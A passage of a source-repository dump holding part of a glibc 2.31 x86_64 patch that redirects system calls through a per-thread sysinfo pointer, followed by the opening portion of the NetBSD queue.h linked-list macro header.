693 | + TYPEFY (arg4, __arg4) = ARGIFY (arg4); \ 694 | + TYPEFY (arg3, __arg3) = ARGIFY (arg3); \ 695 | + TYPEFY (arg2, __arg2) = ARGIFY (arg2); \ 696 | + TYPEFY (arg1, __arg1) = ARGIFY (arg1); \ 697 | + register TYPEFY (arg4, _a4) asm ("r10") = __arg4; \ 698 | + register TYPEFY (arg3, _a3) asm ("rdx") = __arg3; \ 699 | + register TYPEFY (arg2, _a2) asm ("rsi") = __arg2; \ 700 | + register TYPEFY (arg1, _a1) asm ("rdi") = __arg1; \ 701 | + asm volatile ( \ 702 | + "call *%%fs:%P2\n\t" \ 703 | + : "=a" (resultvar) \ 704 | + : "0" (number), "i" (offsetof (tcbhead_t, sysinfo)), "r" (_a1), "r" (_a2), "r" (_a3), "r" (_a4) \ 705 | + : "memory", REGISTERS_CLOBBERED_BY_SYSCALL); \ 706 | + (long int) resultvar; \ 707 | +}) 708 | + 709 | +#undef internal_syscall5 710 | +#define internal_syscall5(number, err, arg1, arg2, arg3, arg4, arg5) \ 711 | +({ \ 712 | + unsigned long int resultvar; \ 713 | + TYPEFY (arg5, __arg5) = ARGIFY (arg5); \ 714 | + TYPEFY (arg4, __arg4) = ARGIFY (arg4); \ 715 | + TYPEFY (arg3, __arg3) = ARGIFY (arg3); \ 716 | + TYPEFY (arg2, __arg2) = ARGIFY (arg2); \ 717 | + TYPEFY (arg1, __arg1) = ARGIFY (arg1); \ 718 | + register TYPEFY (arg5, _a5) asm ("r8") = 
__arg5; \ 719 | + register TYPEFY (arg4, _a4) asm ("r10") = __arg4; \ 720 | + register TYPEFY (arg3, _a3) asm ("rdx") = __arg3; \ 721 | + register TYPEFY (arg2, _a2) asm ("rsi") = __arg2; \ 722 | + register TYPEFY (arg1, _a1) asm ("rdi") = __arg1; \ 723 | + asm volatile ( \ 724 | + "call *%%fs:%P2\n\t" \ 725 | + : "=a" (resultvar) \ 726 | + : "0" (number), "i" (offsetof (tcbhead_t, sysinfo)), "r" (_a1), "r" (_a2), "r" (_a3), "r" (_a4), \ 727 | + "r" (_a5) \ 728 | + : "memory", REGISTERS_CLOBBERED_BY_SYSCALL); \ 729 | + (long int) resultvar; \ 730 | +}) 731 | + 732 | +#undef internal_syscall6 733 | +#define internal_syscall6(number, err, arg1, arg2, arg3, arg4, arg5, arg6) \ 734 | +({ \ 735 | + unsigned long int resultvar; \ 736 | + TYPEFY (arg6, __arg6) = ARGIFY (arg6); \ 737 | + TYPEFY (arg5, __arg5) = ARGIFY (arg5); \ 738 | + TYPEFY (arg4, __arg4) = ARGIFY (arg4); \ 739 | + TYPEFY (arg3, __arg3) = ARGIFY (arg3); \ 740 | + TYPEFY (arg2, __arg2) = ARGIFY (arg2); \ 741 | + TYPEFY (arg1, __arg1) = ARGIFY (arg1); \ 742 | + register TYPEFY (arg6, _a6) asm ("r9") = __arg6; \ 743 | + register TYPEFY (arg5, _a5) asm ("r8") = __arg5; \ 744 | + register TYPEFY (arg4, _a4) asm ("r10") = __arg4; \ 745 | + register TYPEFY (arg3, _a3) asm ("rdx") = __arg3; \ 746 | + register TYPEFY (arg2, _a2) asm ("rsi") = __arg2; \ 747 | + register TYPEFY (arg1, _a1) asm ("rdi") = __arg1; \ 748 | + asm volatile ( \ 749 | + "call *%%fs:%P2\n\t" \ 750 | + : "=a" (resultvar) \ 751 | + : "0" (number), "i" (offsetof (tcbhead_t, sysinfo)), "r" (_a1), "r" (_a2), "r" (_a3), "r" (_a4), \ 752 | + "r" (_a5), "r" (_a6) \ 753 | + : "memory", REGISTERS_CLOBBERED_BY_SYSCALL); \ 754 | + (long int) resultvar; \ 755 | +}) 756 | +/*# else // not shared 757 | +#undef internal_syscall0 758 | +#define internal_syscall0(number, err, dummy...) 
\ 759 | +({ \ 760 | + unsigned long int resultvar; \ 761 | + asm volatile ( \ 762 | + "call *_dl_sysinfo\n\t" \ 763 | + : "=a" (resultvar) \ 764 | + : "0" (number), "i" (offsetof (tcbhead_t, sysinfo)) \ 765 | + : "memory", REGISTERS_CLOBBERED_BY_SYSCALL); \ 766 | + (long int) resultvar; \ 767 | +}) 768 | + 769 | +#undef internal_syscall1 770 | +#define internal_syscall1(number, err, arg1) \ 771 | +({ \ 772 | + unsigned long int resultvar; \ 773 | + TYPEFY (arg1, __arg1) = ARGIFY (arg1); \ 774 | + register TYPEFY (arg1, _a1) asm ("rdi") = __arg1; \ 775 | + asm volatile ( \ 776 | + "call *_dl_sysinfo\n\t" \ 777 | + : "=a" (resultvar) \ 778 | + : "0" (number), "i" (offsetof (tcbhead_t, sysinfo)), "r" (_a1) \ 779 | + : "memory", REGISTERS_CLOBBERED_BY_SYSCALL); \ 780 | + (long int) resultvar; \ 781 | +}) 782 | + 783 | +#undef internal_syscall2 784 | +#define internal_syscall2(number, err, arg1, arg2) \ 785 | +({ \ 786 | + unsigned long int resultvar; \ 787 | + TYPEFY (arg2, __arg2) = ARGIFY (arg2); \ 788 | + TYPEFY (arg1, __arg1) = ARGIFY (arg1); \ 789 | + register TYPEFY (arg2, _a2) asm ("rsi") = __arg2; \ 790 | + register TYPEFY (arg1, _a1) asm ("rdi") = __arg1; \ 791 | + asm volatile ( \ 792 | + "call *_dl_sysinfo\n\t" \ 793 | + : "=a" (resultvar) \ 794 | + : "0" (number), "i" (offsetof (tcbhead_t, sysinfo)), "r" (_a1), "r" (_a2) \ 795 | + : "memory", REGISTERS_CLOBBERED_BY_SYSCALL); \ 796 | + (long int) resultvar; \ 797 | +}) 798 | + 799 | +#undef internal_syscall3 800 | +#define internal_syscall3(number, err, arg1, arg2, arg3) \ 801 | +({ \ 802 | + unsigned long int resultvar; \ 803 | + TYPEFY (arg3, __arg3) = ARGIFY (arg3); \ 804 | + TYPEFY (arg2, __arg2) = ARGIFY (arg2); \ 805 | + TYPEFY (arg1, __arg1) = ARGIFY (arg1); \ 806 | + register TYPEFY (arg3, _a3) asm ("rdx") = __arg3; \ 807 | + register TYPEFY (arg2, _a2) asm ("rsi") = __arg2; \ 808 | + register TYPEFY (arg1, _a1) asm ("rdi") = __arg1; \ 809 | + asm volatile ( \ 810 | + "call *_dl_sysinfo\n\t" \ 811 | + : "=a" (resultvar) \ 812 | + : "0" (number), "i" (offsetof (tcbhead_t, sysinfo)), "r" (_a1), "r" (_a2), "r" (_a3) \ 813 | + : "memory", REGISTERS_CLOBBERED_BY_SYSCALL); \ 814 | + (long int) resultvar; \ 815 | +}) 816 | + 817 | +#undef internal_syscall4 818 | +#define internal_syscall4(number, err, arg1, arg2, arg3, arg4) \ 819 | +({ \ 820 | + unsigned long int resultvar; \ 821 | + TYPEFY (arg4, __arg4) = ARGIFY (arg4); \ 822 | + TYPEFY (arg3, __arg3) = ARGIFY (arg3); \ 823 | + TYPEFY (arg2, __arg2) = ARGIFY (arg2); \ 824 | + TYPEFY (arg1, __arg1) = ARGIFY (arg1); \ 825 | + register TYPEFY (arg4, _a4) asm ("r10") = __arg4; \ 826 | + register TYPEFY (arg3, _a3) asm ("rdx") = __arg3; \ 827 | + register TYPEFY (arg2, _a2) asm ("rsi") = __arg2; \ 828 | + register TYPEFY (arg1, _a1) asm ("rdi") = __arg1; \ 829 | + asm volatile ( \ 830 | + "call *_dl_sysinfo\n\t" \ 831 | + : "=a" (resultvar) \ 832 | + : "0" (number), "i" (offsetof (tcbhead_t, sysinfo)), "r" (_a1), "r" (_a2), "r" (_a3), "r" (_a4) \ 833 | + : "memory", REGISTERS_CLOBBERED_BY_SYSCALL); \ 834 | + (long int) resultvar; \ 835 | +}) 836 | + 837 | +#undef internal_syscall5 838 | +#define internal_syscall5(number, err, arg1, arg2, arg3, arg4, arg5) \ 839 | +({ \ 840 | + unsigned long int resultvar; \ 841 | + TYPEFY (arg5, __arg5) = ARGIFY (arg5); \ 842 | + TYPEFY (arg4, __arg4) = ARGIFY (arg4); \ 843 | + TYPEFY (arg3, __arg3) = ARGIFY (arg3); \ 844 | + TYPEFY (arg2, __arg2) = ARGIFY (arg2); \ 845 | + TYPEFY (arg1, __arg1) = ARGIFY (arg1); \ 846 | + register TYPEFY (arg5, _a5) 
asm ("r8") = __arg5; \ 847 | + register TYPEFY (arg4, _a4) asm ("r10") = __arg4; \ 848 | + register TYPEFY (arg3, _a3) asm ("rdx") = __arg3; \ 849 | + register TYPEFY (arg2, _a2) asm ("rsi") = __arg2; \ 850 | + register TYPEFY (arg1, _a1) asm ("rdi") = __arg1; \ 851 | + asm volatile ( \ 852 | + "call *_dl_sysinfo\n\t" \ 853 | + : "=a" (resultvar) \ 854 | + : "0" (number), "i" (offsetof (tcbhead_t, sysinfo)), "r" (_a1), "r" (_a2), "r" (_a3), "r" (_a4), \ 855 | + "r" (_a5) \ 856 | + : "memory", REGISTERS_CLOBBERED_BY_SYSCALL); \ 857 | + (long int) resultvar; \ 858 | +}) 859 | + 860 | +#undef internal_syscall6 861 | +#define internal_syscall6(number, err, arg1, arg2, arg3, arg4, arg5, arg6) \ 862 | +({ \ 863 | + unsigned long int resultvar; \ 864 | + TYPEFY (arg6, __arg6) = ARGIFY (arg6); \ 865 | + TYPEFY (arg5, __arg5) = ARGIFY (arg5); \ 866 | + TYPEFY (arg4, __arg4) = ARGIFY (arg4); \ 867 | + TYPEFY (arg3, __arg3) = ARGIFY (arg3); \ 868 | + TYPEFY (arg2, __arg2) = ARGIFY (arg2); \ 869 | + TYPEFY (arg1, __arg1) = ARGIFY (arg1); \ 870 | + register TYPEFY (arg6, _a6) asm ("r9") = __arg6; \ 871 | + register TYPEFY (arg5, _a5) asm ("r8") = __arg5; \ 872 | + register TYPEFY (arg4, _a4) asm ("r10") = __arg4; \ 873 | + register TYPEFY (arg3, _a3) asm ("rdx") = __arg3; \ 874 | + register TYPEFY (arg2, _a2) asm ("rsi") = __arg2; \ 875 | + register TYPEFY (arg1, _a1) asm ("rdi") = __arg1; \ 876 | + asm volatile ( \ 877 | + "call *_dl_sysinfo\n\t" \ 878 | + : "=a" (resultvar) \ 879 | + : "0" (number), "i" (offsetof (tcbhead_t, sysinfo)), "r" (_a1), "r" (_a2), "r" (_a3), "r" (_a4), \ 880 | + "r" (_a5), "r" (_a6) \ 881 | + : "memory", REGISTERS_CLOBBERED_BY_SYSCALL); \ 882 | + (long int) resultvar; \ 883 | +}) 884 | +# endif // end if shared*/ 885 | +# else // not use vsycall 886 | #undef internal_syscall0 887 | #define internal_syscall0(number, err, dummy...) \ 888 | ({ \ 889 | @@ -352,6 +788,7 @@ 890 | : "memory", REGISTERS_CLOBBERED_BY_SYSCALL); \ 891 | (long int) resultvar; \ 892 | }) 893 | +#endif // end if use vsycall 894 | 895 | # undef INTERNAL_SYSCALL_ERROR_P 896 | # define INTERNAL_SYSCALL_ERROR_P(val, err) \ 897 | diff -urN glibc-2.31_base/sysdeps/x86_64/nptl/tcb-offsets.sym glibc-2.31_pre_tls/sysdeps/x86_64/nptl/tcb-offsets.sym 898 | --- glibc-2.31_base/sysdeps/x86_64/nptl/tcb-offsets.sym 2020-02-01 12:52:50.000000000 +0100 899 | +++ glibc-2.31_pre_tls/sysdeps/x86_64/nptl/tcb-offsets.sym 2022-01-26 10:31:38.000000000 +0100 900 | @@ -12,6 +12,7 @@ 901 | MULTIPLE_THREADS_OFFSET offsetof (tcbhead_t, multiple_threads) 902 | POINTER_GUARD offsetof (tcbhead_t, pointer_guard) 903 | VGETCPU_CACHE_OFFSET offsetof (tcbhead_t, vgetcpu_cache) 904 | +SYSINFO_OFFSET offsetof (tcbhead_t, sysinfo) 905 | FEATURE_1_OFFSET offsetof (tcbhead_t, feature_1) 906 | SSP_BASE_OFFSET offsetof (tcbhead_t, ssp_base) 907 | 908 | diff -urN glibc-2.31_base/sysdeps/x86_64/nptl/tls.h glibc-2.31_pre_tls/sysdeps/x86_64/nptl/tls.h 909 | --- glibc-2.31_base/sysdeps/x86_64/nptl/tls.h 2020-02-01 12:52:50.000000000 +0100 910 | +++ glibc-2.31_pre_tls/sysdeps/x86_64/nptl/tls.h 2022-01-26 16:32:32.752959454 +0100 911 | @@ -19,6 +19,7 @@ 912 | #ifndef _TLS_H 913 | #define _TLS_H 1 914 | 915 | +#include 916 | #ifndef __ASSEMBLER__ 917 | # include /* For ARCH_SET_FS. 
*/ 918 | # include 919 | @@ -144,6 +145,13 @@ 920 | # define GET_DTV(descr) \ 921 | (((tcbhead_t *) (descr))->dtv) 922 | 923 | +//#define THREAD_SELF_SYSINFO THREAD_GETMEM (THREAD_SELF, header.sysinfo) 924 | +//#define THREAD_SYSINFO(pd) ((pd)->header.sysinfo) 925 | + 926 | +#ifdef NEED_DL_SYSINFO 927 | +#define SETUP_THREAD_SYSINFO(pd) ((pd)->header.sysinfo = THREAD_GETMEM (THREAD_SELF, header.sysinfo)) 928 | +#define CHECK_THREAD_SYSINFO(pd) assert ((pd)->header.sysinfo == THREAD_GETMEM (THREAD_SELF, header.sysinfo)) 929 | +#endif 930 | 931 | /* Code to initially initialize the thread pointer. This might need 932 | special attention since 'errno' is not yet available and if the 933 | @@ -151,6 +159,31 @@ 934 | 935 | We have to make the syscall for both uses of the macro since the 936 | address might be (and probably is) different. */ 937 | + 938 | +#if defined NEED_DL_SYSINFO 939 | +# define TLS_INIT_TP(thrdescr) \ 940 | + ({ void *_thrdescr = (thrdescr); \ 941 | + tcbhead_t *_head = _thrdescr; \ 942 | + int _result; \ 943 | + \ 944 | + _head->tcb = _thrdescr; \ 945 | + /* For now the thread descriptor is at the same address. */ \ 946 | + _head->self = _thrdescr; \ 947 | + \ 948 | + _head->sysinfo = GLRO(dl_sysinfo); \ 949 | + \ 950 | + /* It is a simple syscall to set the %fs value for the thread. */ \ 951 | + asm volatile ("callq *%4" \ 952 | + : "=a" (_result) \ 953 | + : "0" ((unsigned long int) __NR_arch_prctl), \ 954 | + "D" ((unsigned long int) ARCH_SET_FS), \ 955 | + "S" (_thrdescr), \ 956 | + "m" (_head->sysinfo) \ 957 | + : "memory", "cc", "r11", "cx"); \ 958 | + \ 959 | + _result ? "cannot set %fs base address for thread-local storage" : 0; \ 960 | + }) 961 | +#else 962 | # define TLS_INIT_TP(thrdescr) \ 963 | ({ void *_thrdescr = (thrdescr); \ 964 | tcbhead_t *_head = _thrdescr; \ 965 | @@ -170,6 +203,7 @@ 966 | \ 967 | _result ? "cannot set %fs base address for thread-local storage" : 0; \ 968 | }) 969 | +#endif 970 | 971 | # define TLS_DEFINE_INIT_TP(tp, pd) void *tp = (pd) 972 | 973 | -------------------------------------------------------------------------------- /queue.h: -------------------------------------------------------------------------------- 1 | /* $NetBSD: queue.h,v 1.68 2014/11/19 08:10:01 uebayasi Exp $ */ 2 | 3 | /* 4 | * Copyright (c) 1991, 1993 5 | * The Regents of the University of California. All rights reserved. 6 | * 7 | * Redistribution and use in source and binary forms, with or without 8 | * modification, are permitted provided that the following conditions 9 | * are met: 10 | * 1. Redistributions of source code must retain the above copyright 11 | * notice, this list of conditions and the following disclaimer. 12 | * 2. Redistributions in binary form must reproduce the above copyright 13 | * notice, this list of conditions and the following disclaimer in the 14 | * documentation and/or other materials provided with the distribution. 15 | * 3. Neither the name of the University nor the names of its contributors 16 | * may be used to endorse or promote products derived from this software 17 | * without specific prior written permission. 18 | * 19 | * THIS SOFTWARE IS PROVIDED BY THE REGENTS AND CONTRIBUTORS ``AS IS'' AND 20 | * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE 21 | * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE 22 | * ARE DISCLAIMED. 
IN NO EVENT SHALL THE REGENTS OR CONTRIBUTORS BE LIABLE 23 | * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL 24 | * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS 25 | * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) 26 | * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT 27 | * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY 28 | * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF 29 | * SUCH DAMAGE. 30 | * 31 | * @(#)queue.h 8.5 (Berkeley) 8/20/94 32 | */ 33 | 34 | #ifndef _BMK_CORE_QUEUE_H_ 35 | #define _BMK_CORE_QUEUE_H_ 36 | 37 | /* 38 | * This file defines five types of data structures: singly-linked lists, 39 | * lists, simple queues, tail queues, and circular queues. 40 | * 41 | * A singly-linked list is headed by a single forward pointer. The 42 | * elements are singly linked for minimum space and pointer manipulation 43 | * overhead at the expense of O(n) removal for arbitrary elements. New 44 | * elements can be added to the list after an existing element or at the 45 | * head of the list. Elements being removed from the head of the list 46 | * should use the explicit macro for this purpose for optimum 47 | * efficiency. A singly-linked list may only be traversed in the forward 48 | * direction. Singly-linked lists are ideal for applications with large 49 | * datasets and few or no removals or for implementing a LIFO queue. 50 | * 51 | * A list is headed by a single forward pointer (or an array of forward 52 | * pointers for a hash table header). The elements are doubly linked 53 | * so that an arbitrary element can be removed without a need to 54 | * traverse the list. New elements can be added to the list before 55 | * or after an existing element or at the head of the list. A list 56 | * may only be traversed in the forward direction. 57 | * 58 | * A simple queue is headed by a pair of pointers, one the head of the 59 | * list and the other to the tail of the list. The elements are singly 60 | * linked to save space, so elements can only be removed from the 61 | * head of the list. New elements can be added to the list after 62 | * an existing element, at the head of the list, or at the end of the 63 | * list. A simple queue may only be traversed in the forward direction. 64 | * 65 | * A tail queue is headed by a pair of pointers, one to the head of the 66 | * list and the other to the tail of the list. The elements are doubly 67 | * linked so that an arbitrary element can be removed without a need to 68 | * traverse the list. New elements can be added to the list before or 69 | * after an existing element, at the head of the list, or at the end of 70 | * the list. A tail queue may be traversed in either direction. 71 | * 72 | * A circle queue is headed by a pair of pointers, one to the head of the 73 | * list and the other to the tail of the list. The elements are doubly 74 | * linked so that an arbitrary element can be removed without a need to 75 | * traverse the list. New elements can be added to the list before or after 76 | * an existing element, at the head of the list, or at the end of the list. 77 | * A circle queue may be traversed in either direction, but has a more 78 | * complex end of list detection. 79 | * 80 | * For details on the use of these macros, see the queue(3) manual page. 
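 *
 * Illustrative sketch (assumed usage, not a definitive example; the names
 * struct entry, value, link and q below are hypothetical, and printf/malloc
 * are taken from <stdio.h>/<stdlib.h>):
 *
 *	struct entry { int value; TAILQ_ENTRY(entry) link; };
 *	TAILQ_HEAD(entry_head, entry) q = TAILQ_HEAD_INITIALIZER(q);
 *
 *	struct entry *e = malloc(sizeof(*e));
 *	e->value = 42;
 *	TAILQ_INSERT_TAIL(&q, e, link);		-- append at the tail
 *	TAILQ_FOREACH(e, &q, link)
 *		printf("%d\n", e->value);	-- visits elements in insertion order
 *	while (!TAILQ_EMPTY(&q)) {
 *		e = TAILQ_FIRST(&q);		-- doubly linked, so removal needs no traversal
 *		TAILQ_REMOVE(&q, e, link);
 *		free(e);
 *	}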
81 | */ 82 | 83 | //#include 84 | /* $NetBSD: null.h,v 1.9 2010/07/06 11:56:20 kleink Exp $ */ 85 | 86 | /* 87 | * Written by Klaus Klein , December 22, 1999. 88 | * Public domain. 89 | */ 90 | 91 | #ifndef _BMK_CORE_NULL_H_ 92 | #define _BMK_CORE_NULL_H_ 93 | #ifndef NULL 94 | #if !defined(__GNUG__) || __GNUG__ < 2 || (__GNUG__ == 2 && __GNUC_MINOR__ < 90) 95 | #if !defined(__cplusplus) 96 | #define NULL ((void *)0) 97 | #else 98 | #define NULL 0 99 | #endif /* !__cplusplus */ 100 | #else 101 | #define NULL __null 102 | #endif 103 | #endif 104 | #endif /* _BMK_CORE_NULL_H_ */ 105 | 106 | 107 | #if defined(QUEUEDEBUG) 108 | # if defined(_KERNEL) 109 | # define QUEUEDEBUG_ABORT(...) panic(__VA_ARGS__) 110 | # else 111 | # include 112 | # define QUEUEDEBUG_ABORT(...) err(1, __VA_ARGS__) 113 | # endif 114 | #endif 115 | 116 | /* 117 | * Singly-linked List definitions. 118 | */ 119 | #define SLIST_HEAD(name, type) \ 120 | struct name { \ 121 | struct type *slh_first; /* first element */ \ 122 | } 123 | 124 | #define SLIST_HEAD_INITIALIZER(head) \ 125 | { NULL } 126 | 127 | #define SLIST_ENTRY(type) \ 128 | struct { \ 129 | struct type *sle_next; /* next element */ \ 130 | } 131 | 132 | /* 133 | * Singly-linked List access methods. 134 | */ 135 | #define SLIST_FIRST(head) ((head)->slh_first) 136 | #define SLIST_END(head) NULL 137 | #define SLIST_EMPTY(head) ((head)->slh_first == NULL) 138 | #define SLIST_NEXT(elm, field) ((elm)->field.sle_next) 139 | 140 | #define SLIST_FOREACH(var, head, field) \ 141 | for((var) = (head)->slh_first; \ 142 | (var) != SLIST_END(head); \ 143 | (var) = (var)->field.sle_next) 144 | 145 | #define SLIST_FOREACH_SAFE(var, head, field, tvar) \ 146 | for ((var) = SLIST_FIRST((head)); \ 147 | (var) != SLIST_END(head) && \ 148 | ((tvar) = SLIST_NEXT((var), field), 1); \ 149 | (var) = (tvar)) 150 | 151 | /* 152 | * Singly-linked List functions. 153 | */ 154 | #define SLIST_INIT(head) do { \ 155 | (head)->slh_first = SLIST_END(head); \ 156 | } while (/*CONSTCOND*/0) 157 | 158 | #define SLIST_INSERT_AFTER(slistelm, elm, field) do { \ 159 | (elm)->field.sle_next = (slistelm)->field.sle_next; \ 160 | (slistelm)->field.sle_next = (elm); \ 161 | } while (/*CONSTCOND*/0) 162 | 163 | #define SLIST_INSERT_HEAD(head, elm, field) do { \ 164 | (elm)->field.sle_next = (head)->slh_first; \ 165 | (head)->slh_first = (elm); \ 166 | } while (/*CONSTCOND*/0) 167 | 168 | #define SLIST_REMOVE_AFTER(slistelm, field) do { \ 169 | (slistelm)->field.sle_next = \ 170 | SLIST_NEXT(SLIST_NEXT((slistelm), field), field); \ 171 | } while (/*CONSTCOND*/0) 172 | 173 | #define SLIST_REMOVE_HEAD(head, field) do { \ 174 | (head)->slh_first = (head)->slh_first->field.sle_next; \ 175 | } while (/*CONSTCOND*/0) 176 | 177 | #define SLIST_REMOVE(head, elm, type, field) do { \ 178 | if ((head)->slh_first == (elm)) { \ 179 | SLIST_REMOVE_HEAD((head), field); \ 180 | } \ 181 | else { \ 182 | struct type *curelm = (head)->slh_first; \ 183 | while(curelm->field.sle_next != (elm)) \ 184 | curelm = curelm->field.sle_next; \ 185 | curelm->field.sle_next = \ 186 | curelm->field.sle_next->field.sle_next; \ 187 | } \ 188 | } while (/*CONSTCOND*/0) 189 | 190 | 191 | /* 192 | * List definitions. 
193 | */ 194 | #define LIST_HEAD(name, type) \ 195 | struct name { \ 196 | struct type *lh_first; /* first element */ \ 197 | } 198 | 199 | #define LIST_HEAD_INITIALIZER(head) \ 200 | { NULL } 201 | 202 | #define LIST_ENTRY(type) \ 203 | struct { \ 204 | struct type *le_next; /* next element */ \ 205 | struct type **le_prev; /* address of previous next element */ \ 206 | } 207 | 208 | /* 209 | * List access methods. 210 | */ 211 | #define LIST_FIRST(head) ((head)->lh_first) 212 | #define LIST_END(head) NULL 213 | #define LIST_EMPTY(head) ((head)->lh_first == LIST_END(head)) 214 | #define LIST_NEXT(elm, field) ((elm)->field.le_next) 215 | 216 | #define LIST_FOREACH(var, head, field) \ 217 | for ((var) = ((head)->lh_first); \ 218 | (var) != LIST_END(head); \ 219 | (var) = ((var)->field.le_next)) 220 | 221 | #define LIST_FOREACH_SAFE(var, head, field, tvar) \ 222 | for ((var) = LIST_FIRST((head)); \ 223 | (var) != LIST_END(head) && \ 224 | ((tvar) = LIST_NEXT((var), field), 1); \ 225 | (var) = (tvar)) 226 | 227 | #define LIST_MOVE(head1, head2) do { \ 228 | LIST_INIT((head2)); \ 229 | if (!LIST_EMPTY((head1))) { \ 230 | (head2)->lh_first = (head1)->lh_first; \ 231 | LIST_INIT((head1)); \ 232 | } \ 233 | } while (/*CONSTCOND*/0) 234 | 235 | /* 236 | * List functions. 237 | */ 238 | #if defined(QUEUEDEBUG) 239 | #define QUEUEDEBUG_LIST_INSERT_HEAD(head, elm, field) \ 240 | if ((head)->lh_first && \ 241 | (head)->lh_first->field.le_prev != &(head)->lh_first) \ 242 | QUEUEDEBUG_ABORT("LIST_INSERT_HEAD %p %s:%d", (head), \ 243 | __FILE__, __LINE__); 244 | #define QUEUEDEBUG_LIST_OP(elm, field) \ 245 | if ((elm)->field.le_next && \ 246 | (elm)->field.le_next->field.le_prev != \ 247 | &(elm)->field.le_next) \ 248 | QUEUEDEBUG_ABORT("LIST_* forw %p %s:%d", (elm), \ 249 | __FILE__, __LINE__); \ 250 | if (*(elm)->field.le_prev != (elm)) \ 251 | QUEUEDEBUG_ABORT("LIST_* back %p %s:%d", (elm), \ 252 | __FILE__, __LINE__); 253 | #define QUEUEDEBUG_LIST_POSTREMOVE(elm, field) \ 254 | (elm)->field.le_next = (void *)1L; \ 255 | (elm)->field.le_prev = (void *)1L; 256 | #else 257 | #define QUEUEDEBUG_LIST_INSERT_HEAD(head, elm, field) 258 | #define QUEUEDEBUG_LIST_OP(elm, field) 259 | #define QUEUEDEBUG_LIST_POSTREMOVE(elm, field) 260 | #endif 261 | 262 | #define LIST_INIT(head) do { \ 263 | (head)->lh_first = LIST_END(head); \ 264 | } while (/*CONSTCOND*/0) 265 | 266 | #define LIST_INSERT_AFTER(listelm, elm, field) do { \ 267 | QUEUEDEBUG_LIST_OP((listelm), field) \ 268 | if (((elm)->field.le_next = (listelm)->field.le_next) != \ 269 | LIST_END(head)) \ 270 | (listelm)->field.le_next->field.le_prev = \ 271 | &(elm)->field.le_next; \ 272 | (listelm)->field.le_next = (elm); \ 273 | (elm)->field.le_prev = &(listelm)->field.le_next; \ 274 | } while (/*CONSTCOND*/0) 275 | 276 | #define LIST_INSERT_BEFORE(listelm, elm, field) do { \ 277 | QUEUEDEBUG_LIST_OP((listelm), field) \ 278 | (elm)->field.le_prev = (listelm)->field.le_prev; \ 279 | (elm)->field.le_next = (listelm); \ 280 | *(listelm)->field.le_prev = (elm); \ 281 | (listelm)->field.le_prev = &(elm)->field.le_next; \ 282 | } while (/*CONSTCOND*/0) 283 | 284 | #define LIST_INSERT_HEAD(head, elm, field) do { \ 285 | QUEUEDEBUG_LIST_INSERT_HEAD((head), (elm), field) \ 286 | if (((elm)->field.le_next = (head)->lh_first) != LIST_END(head))\ 287 | (head)->lh_first->field.le_prev = &(elm)->field.le_next;\ 288 | (head)->lh_first = (elm); \ 289 | (elm)->field.le_prev = &(head)->lh_first; \ 290 | } while (/*CONSTCOND*/0) 291 | 292 | #define LIST_REMOVE(elm, field) do { 
\ 293 | QUEUEDEBUG_LIST_OP((elm), field) \ 294 | if ((elm)->field.le_next != NULL) \ 295 | (elm)->field.le_next->field.le_prev = \ 296 | (elm)->field.le_prev; \ 297 | *(elm)->field.le_prev = (elm)->field.le_next; \ 298 | QUEUEDEBUG_LIST_POSTREMOVE((elm), field) \ 299 | } while (/*CONSTCOND*/0) 300 | 301 | #define LIST_REPLACE(elm, elm2, field) do { \ 302 | if (((elm2)->field.le_next = (elm)->field.le_next) != NULL) \ 303 | (elm2)->field.le_next->field.le_prev = \ 304 | &(elm2)->field.le_next; \ 305 | (elm2)->field.le_prev = (elm)->field.le_prev; \ 306 | *(elm2)->field.le_prev = (elm2); \ 307 | QUEUEDEBUG_LIST_POSTREMOVE((elm), field) \ 308 | } while (/*CONSTCOND*/0) 309 | 310 | /* 311 | * Simple queue definitions. 312 | */ 313 | #define SIMPLEQ_HEAD(name, type) \ 314 | struct name { \ 315 | struct type *sqh_first; /* first element */ \ 316 | struct type **sqh_last; /* addr of last next element */ \ 317 | } 318 | 319 | #define SIMPLEQ_HEAD_INITIALIZER(head) \ 320 | { NULL, &(head).sqh_first } 321 | 322 | #define SIMPLEQ_ENTRY(type) \ 323 | struct { \ 324 | struct type *sqe_next; /* next element */ \ 325 | } 326 | 327 | /* 328 | * Simple queue access methods. 329 | */ 330 | #define SIMPLEQ_FIRST(head) ((head)->sqh_first) 331 | #define SIMPLEQ_END(head) NULL 332 | #define SIMPLEQ_EMPTY(head) ((head)->sqh_first == SIMPLEQ_END(head)) 333 | #define SIMPLEQ_NEXT(elm, field) ((elm)->field.sqe_next) 334 | 335 | #define SIMPLEQ_FOREACH(var, head, field) \ 336 | for ((var) = ((head)->sqh_first); \ 337 | (var) != SIMPLEQ_END(head); \ 338 | (var) = ((var)->field.sqe_next)) 339 | 340 | #define SIMPLEQ_FOREACH_SAFE(var, head, field, next) \ 341 | for ((var) = ((head)->sqh_first); \ 342 | (var) != SIMPLEQ_END(head) && \ 343 | ((next = ((var)->field.sqe_next)), 1); \ 344 | (var) = (next)) 345 | 346 | /* 347 | * Simple queue functions. 
